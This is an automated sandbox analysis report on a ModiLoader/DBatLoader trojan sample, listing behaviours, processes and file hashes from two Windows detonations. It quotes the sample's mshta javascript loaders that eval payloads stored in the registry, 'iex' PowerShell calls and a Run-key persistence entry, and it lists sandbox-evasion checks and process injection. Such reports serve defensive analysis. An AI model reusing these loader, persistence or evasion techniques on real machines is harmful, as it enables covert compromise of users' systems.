Malware Analysis Report

2024-08-06 14:28

Sample ID 240525-r1w1eaga5y
Target 724bb3a4a3b577685a38a71cd8d870c8_JaffaCakes118
SHA256 1cf92e2ce41fd1ba467d1cb53b7b66023bf0bc37b27a4cefcbe14019f45f6167
Tags
modiloader evasion persistence trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

1cf92e2ce41fd1ba467d1cb53b7b66023bf0bc37b27a4cefcbe14019f45f6167

Threat Level: Known bad

The file 724bb3a4a3b577685a38a71cd8d870c8_JaffaCakes118 was found to be: Known bad.

Malicious Activity Summary

modiloader evasion persistence trojan

ModiLoader, DBatLoader

Process spawned unexpected child process

Looks for VirtualBox Guest Additions in registry

Checks for common network interception software

Looks for VirtualBox drivers on disk

ModiLoader Second Stage

Looks for VMWare Tools registry key

Checks BIOS information in registry

Deletes itself

Checks computer location settings

Adds Run key to start application

Maps connected drives based on registry

Drops file in System32 directory

Suspicious use of SetThreadContext

Unsigned PE

Enumerates physical storage devices

Modifies Internet Explorer settings

Suspicious behavior: MapViewOfSection

Suspicious behavior: EnumeratesProcesses

Modifies registry class

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported

2024-05-25 14:40

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-25 14:40

Reported

2024-05-25 15:13

Platform

win7-20231129-en

Max time kernel

150s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\724bb3a4a3b577685a38a71cd8d870c8_JaffaCakes118.exe"

Signatures

ModiLoader, DBatLoader

trojan modiloader

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\mshta.exe

Checks for common network interception software

evasion

Looks for VirtualBox Guest Additions in registry

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Oracle\VirtualBox Guest Additions C:\Windows\SysWOW64\regsvr32.exe N/A

Looks for VirtualBox drivers on disk

evasion
Description Indicator Process Target
File opened (read-only) C:\WINDOWS\SysWOW64\drivers\VBoxMouse.sys C:\Windows\SysWOW64\regsvr32.exe N/A

ModiLoader Second Stage

Description Indicator Process Target
N/A N/A N/A N/A

Looks for VMWare Tools registry key

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\VMware, Inc.\VMware Tools C:\Windows\SysWOW64\regsvr32.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\regsvr32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Windows\SysWOW64\regsvr32.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "\"C:\\Users\\Admin\\AppData\\Local\\d866a3c3\\2abf568c.bat\"" C:\Windows\SysWOW64\regsvr32.exe N/A

Maps connected drives based on registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 C:\Windows\SysWOW64\regsvr32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\Windows\SysWOW64\regsvr32.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2648 set thread context of 2672 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2672 set thread context of 2804 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe

Enumerates physical storage devices

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\International C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl C:\Windows\SysWOW64\regsvr32.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\a3267dda\shell\open\command\ = "\"C:\\Windows\\system32\\mshta.exe\" \"javascript:nZdK9g2GV=\"u\";sJ9=new ActiveXObject(\"WScript.Shell\");vz15nWuNJ=\"J\";uSaM4=sJ9.RegRead(\"HKCU\\\\software\\\\hsgrudze\\\\zdxvakv\");Q3M6if=\"DUNKO\";eval(uSaM4);rlUa5J=\"so2Feu\";\"" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\.5ad3c886b C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\.5ad3c886b\ = "a3267dda" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\a3267dda C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\a3267dda\shell C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\a3267dda\shell\open C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\a3267dda\shell\open\command C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2984 wrote to memory of 2648 N/A C:\Windows\system32\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2648 wrote to memory of 2672 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2672 wrote to memory of 2804 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe

Processes

C:\Users\Admin\AppData\Local\Temp\724bb3a4a3b577685a38a71cd8d870c8_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\724bb3a4a3b577685a38a71cd8d870c8_JaffaCakes118.exe"

C:\Windows\system32\mshta.exe

"C:\Windows\system32\mshta.exe" javascript:AK3hyn="b";m31w=new%20ActiveXObject("WScript.Shell");Jxu8RXuz="Rtij";xQ75zg=m31w.RegRead("HKCU\\software\\6kqUkUFa\\4BSKlMSrW7");t5VlXPF4i="Q";eval(xQ75zg);gZk9A="d";

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:ydmjrc

C:\Windows\SysWOW64\regsvr32.exe

regsvr32.exe

C:\Windows\SysWOW64\regsvr32.exe

"C:\Windows\SysWOW64\regsvr32.exe"

Network


Files

C:\Users\Admin\AppData\Local\d866a3c3\1ac3c0ce.5ad3c886b

MD5 b28d6b63bcc68fddb33cd9512e790208
SHA1 d7df52970f862d37e254dd57c479afc0220ec777
SHA256 e2f4a902968027e27ded59a3adad608c67db0e352d0031cdc8c6ce06caa0edc6
SHA512 11ad8d9036eac459d8d94a9cc3b871c5dbf290ca52880785ed64747f5bd06379869baa148fd4c1ecb215881b98242c21817f40829383250cc83a828d404f3732

C:\Users\Admin\AppData\Local\d866a3c3\2abf568c.bat

MD5 37e7abf643837ff38212a6e350f5e027
SHA1 f76cc289acac6477d66e199545b7042cb137997e
SHA256 0013f40c559da60a2b9d1f617c0788980e002d9038590a35ebc18f3fd3afc1ac
SHA512 746ad85e821ccdeddee724cb0d9aae1abe581794f4911b78f1449215f3adb4dbccb06dfb85317fba40935fa7b54ace913c97c1888265c1da0e07a26fbe04d874

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-25 14:40

Reported

2024-05-25 15:13

Platform

win10v2004-20240426-en

Max time kernel

148s

Max time network

153s

Command Line

"C:\Users\Admin\AppData\Local\Temp\724bb3a4a3b577685a38a71cd8d870c8_JaffaCakes118.exe"

Signatures

ModiLoader, DBatLoader

trojan modiloader

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\mshta.exe

ModiLoader Second Stage

Description Indicator Process Target
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation C:\Windows\system32\mshta.exe N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1392 wrote to memory of 1532 N/A C:\Windows\system32\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Users\Admin\AppData\Local\Temp\724bb3a4a3b577685a38a71cd8d870c8_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\724bb3a4a3b577685a38a71cd8d870c8_JaffaCakes118.exe"

C:\Windows\system32\mshta.exe

"C:\Windows\system32\mshta.exe" javascript:lwg0u1="oh";qz2=new%20ActiveXObject("WScript.Shell");ESa17p="0QN8JTtY";WeS71m=qz2.RegRead("HKCU\\software\\mENrsLhvi\\7tPJpgkf");Utwl15="VyGpFB";eval(WeS71m);mPXr1dDj="OVZ7Vp";

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:cmfw

Network


Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bnqvhsqt.bds.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
